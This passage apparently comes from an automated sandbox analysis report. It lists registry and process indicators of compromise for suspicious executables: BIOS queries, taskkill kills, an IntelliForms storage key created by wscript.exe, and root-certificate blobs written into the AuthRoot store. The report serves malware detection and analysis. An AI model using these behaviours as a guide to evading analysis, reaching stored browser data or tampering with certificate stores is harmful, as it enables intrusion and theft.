WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5312 taskkill.exe 6732 taskkill.exe 1092 taskkill.exe 4656 taskkill.exe -
Processes:
wscript.exedescription ioc process Key created \Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 wscript.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
WaaSMedicAgent.exesvchost.exeWaaSMedicAgent.exeWaaSMedicAgent.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe -
Modifies registry class 6 IoCs
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE -
Processes:
chenxiulan-game.exeXyzhepuwytae.exeinstaller.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f chenxiulan-game.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Xyzhepuwytae.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f chenxiulan-game.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 Xyzhepuwytae.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 